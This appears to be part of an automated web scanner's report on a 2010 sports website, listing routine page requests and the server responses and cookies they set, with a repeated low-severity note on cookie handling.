GET /nfl/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:56:20 GMT Location: /nfl/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN35 Set-Cookie: SWID=6979213A-5F48-4FFF-AB25-B2C27D5965D8; path=/; expires=Sat, 13-Nov-2030 17:56:20 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nfl/teams ">/nfl/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nfl/feature/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 17:58:32 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=87BF7091-A53D-4F45-B2BD-DF79FB4CE47E; path=/; expires=Sat, 13-Nov-2030 17:58:32 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:58:52 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nfl/mnf HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:58:51 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=AFD7983B-8389-49D6-AD14-097781E023FF; path=/; expires=Sat, 13-Nov-2030 17:58:51 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:36:41 GMT Content-Length: 83888 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:58:52 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nfl/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sat, 13 Nov 2010 17:55:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:08:50 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=B8A2F562-3187-44FD-8521-715A53882AA6; path=/; expires=Sat, 13-Nov-2030 17:55:57 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:15:50 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/boxscore HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:02:53 GMT Location: http://sports.espn.go.com/nhl/scoreboard Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Set-Cookie: SWID=BAB1F0F5-CD4E-4C29-B71E-938DC1274297; path=/; expires=Sat, 13-Nov-2030 18:02:53 GMT; domain=.go.com; Content-Length: 197 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/nhl/scoreboard ">http://sports.espn.go.com/nhl/scoreboard </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:01:41 GMT Location: http://espn.go.com/nhl/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=C65628F9-CABD-4CE9-A514-0E9FB78BAE32; path=/; expires=Sat, 13-Nov-2030 18:01:41 GMT; domain=.go.com; Content-Length: 173 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/nhl/teams ">http://espn.go.com/nhl/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/gamecast HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:02:42 GMT Location: http://sports.espn.go.com/nhl/scoreboard Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=D07E910B-61AD-4221-A836-9E1F3D272A50; path=/; expires=Sat, 13-Nov-2030 18:02:42 GMT; domain=.go.com; Content-Length: 197 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/nhl/scoreboard ">http://sports.espn.go.com/nhl/scoreboard </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:01:24 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 18:01:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=A45895D3-70CF-4BE2-9BFB-72D449C31553; path=/; expires=Sat, 13-Nov-2030 18:01:24 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:02:02 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/players/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:03:22 GMT Location: http://espn.go.com/nhl/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=1B0C3156-48B1-4DF8-B807-BC37F5366A67; path=/; expires=Sat, 13-Nov-2030 18:03:22 GMT; domain=.go.com; Content-Length: 173 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/nhl/index ">http://espn.go.com/nhl/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nhl/recap HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:03:09 GMT Location: http://sports.espn.go.com/nhl/scoreboard Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Set-Cookie: SWID=A18FD989-2422-4D90-A5FD-E628C4F5AE0F; path=/; expires=Sat, 13-Nov-2030 18:03:09 GMT; domain=.go.com; Content-Length: 197 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/nhl/scoreboard ">http://sports.espn.go.com/nhl/scoreboard </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com
DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /poker/ HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:38 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=6C30C50F-3FA5-4E1B-8CEC-85BEDA536361; path=/; expires=Sat, 13-Nov-2030 18:16:38 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:22:36 GMT Content-Length: 65769 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /racing/grid HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:08:56 GMT Location: /racing Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=1D412F0C-9BD5-4473-BD80-8939E9FF1376; path=/; expires=Sat, 13-Nov-2030 18:08:56 GMT; domain=.go.com; Content-Length: 131 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/racing ">/racing </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /racing/qualifying HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:09:52 GMT Location: /racing Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Set-Cookie: SWID=39DF27A4-B946-4ABA-9330-526504DDCAF5; path=/; expires=Sat, 13-Nov-2030 18:09:52 GMT; domain=.go.com; Content-Length: 131 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/racing ">/racing </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /racing/raceresults HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:09:26 GMT Location: /racing Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Set-Cookie: SWID=3A198C40-073F-4D07-B2C5-4759FF9B06AB; path=/; expires=Sat, 13-Nov-2030 18:09:26 GMT; domain=.go.com; Content-Length: 131 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/racing ">/racing </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:08:36 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /racing/schedule/_/series/sprint HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:08:36 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=0F2EFF68-57CE-423C-8D40-61462BFBCFE6; path=/; expires=Sat, 13-Nov-2030 18:08:35 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:16:55 GMT Content-Length: 61978 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:08:36 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sports/format/design09/index/leagueInfo HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:43:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:43:39 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Set-Cookie: SWID=D63082E1-5B30-4682-9CE2-7660FAC8CBED; path=/; expires=Sat, 13-Nov-2030 17:43:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:45:54 GMT Content-Length: 338 Connection: close X-UA-Compatible: IE=EmulateIE7
<script id="ltabInitScript1289670220939"> // Because I don't have an ID on the tab container, // I'll use an ID on the script block and traverse siblings from there espn.core.init.tabs(jQuery ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:05 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sports/scores/window HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:05 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=C3047163-669F-485D-A1B6-1C4C4263C3AF; path=/; expires=Sat, 13-Nov-2030 17:44:05 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:44:20 GMT Content-Length: 8624 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:05 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sports/webslices/sport HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 17:43:39 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Set-Cookie: SWID=257AFFE4-D60B-45D2-802B-F48D089FCC23; path=/; expires=Sat, 13-Nov-2030 17:43:39 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:18 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sportsnation/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:17:18 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Set-Cookie: SWID=A665627E-B567-429A-B422-47DA6BE6E1AC; path=/; expires=Sat, 13-Nov-2030 18:17:18 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:17:24 GMT Content-Length: 165044 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:18 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:52 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sportsnation/polls HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:52 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Set-Cookie: SWID=167E8A12-B4DB-4390-9328-BB7FCF0ECCE2; path=/; expires=Sat, 13-Nov-2030 18:16:52 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:22:33 GMT Content-Length: 36126 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:52 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sportsnation/rank HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:16:56 GMT Location: http://sports.espn.go.com/chat/sportsnation/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN09 Set-Cookie: SWID=0798070D-4099-45B2-9931-2256969C605D; path=/; expires=Sat, 13-Nov-2030 18:16:56 GMT; domain=.go.com; Content-Length: 215 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/chat/sportsnation/index ">http://sports.espn.go.com/chat/sportsnation/index </A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/category HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 18:15:42 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Set-Cookie: SWID=2A6C3D3E-BA4D-41AB-9DAB-03C2C2F49008; path=/; expires=Sat, 13-Nov-2030 18:15:42 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/clip HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 18:15:37 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=C149951B-881F-4474-932C-82368E21BF35; path=/; expires=Sat, 13-Nov-2030 18:15:37 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /video/overlay HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
